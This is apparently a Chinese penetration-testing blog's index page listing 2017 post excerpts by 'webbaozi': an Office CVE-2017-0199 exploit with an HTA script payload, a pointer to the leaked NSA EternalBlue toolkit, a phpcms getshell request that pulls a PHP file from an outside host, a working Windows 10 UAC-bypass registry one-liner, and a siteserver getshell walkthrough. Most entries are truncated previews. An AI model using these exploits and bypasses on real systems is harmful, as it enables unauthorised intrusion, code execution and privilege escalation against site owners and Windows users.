热门 CVE-2017-0199 OFFICE OLE2LINK漏洞利用详解

时间:2017-4-18   作者:webbaozi   分类: 渗透测试   热度:1533°    
时间:2017-4-18   分类: 渗透测试    热度:1533  
漏洞概述 fireeye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。 漏洞利用方法 首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下: test789 <script> var objShell = new ActiveXObject("wscript.shell"); objSh...

阅读全文>>

热门 ShadowBrokers 泄漏的美国 NSA 黑客工具包下载地址及复现

时间:2017-4-16   作者:webbaozi   分类: 渗透测试   热度:3921°    
时间:2017-4-16   分类: 渗透测试    热度:3921  
方程式0day的下载地址: https://github.com/misterch0c/shadowbroker 本次公开的工具包中,包含多个 Windows 漏洞的利用工具,只要Windows服务器开了25、88、139、445、3389 等端口之一,就有可能被黑客攻击,其中影响尤为严重的是445和3389端口。 复现过程,收集的网上的(自己电脑太差,虚拟机运行不了那么多。so,看看网上的吧) 方程式 0day ETERNALBLUE  复现过程 视频教程 ETERNALBLUE 本地复...

阅读全文>>

热门 phpcms前台getshell(附:注入)

时间:2017-4-10   作者:webbaozi   分类: 渗透测试   热度:3053°    
时间:2017-4-10   分类: 渗透测试    热度:3053  
1.phpcms文件上传,需要网站开启注册功能 http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1 POST:siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg>...

阅读全文>>

热门 bypassuac收集

时间:2017-4-8   作者:webbaozi   分类: 个人笔记   热度:868°    
时间:2017-4-8   分类: 个人笔记    热度:868  
window10: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f sdclt reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

阅读全文>>

热门 siteserver简单getshell

时间:2017-3-10   作者:webbaozi   分类: 渗透测试   热度:2237°    
时间:2017-3-10   分类: 渗透测试    热度:2237  
1.忘记密码处 1.1登录确定账号   1.2点击忘记密码 然后回答问题,随便填写一个然后抓包,删除填写的内容     然后放包。         2.文件上传 http://wooyun.webbaozi.com/static/bugs/wooyun-2014-053085.html 首先勾选上返回包。   访问地址:htt...

阅读全文>>

热门 kali linux2.0安装vmware-tools方法更新版

时间:2017-3-5   作者:webbaozi   分类: 个人笔记   热度:891°    
时间:2017-3-5   分类: 个人笔记    热度:891  
众所周知,我们用vmware的时候总要安装vmware-tools来方便我们与宿主机共享文件,这也极大地方便了我们的操作;所以安装也是必要的选择,但是很少有人能了解这里面的原理,小编这就把自己的经验和大家分享一下,给新手朋友提供借鉴!大牛请绕过~~~ 0X01:首先在终端输入命令:apt-get install linux-headers-$(uname -r)来查看是否有内核头文件;这也是安装vmware-tools的准备工作之一;然而很多时候很不幸的看到的结果是无法定位软件包或者找不到内核头文件;不要着急,小编帮你解决;请看下一步: 0X02:这时,小...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1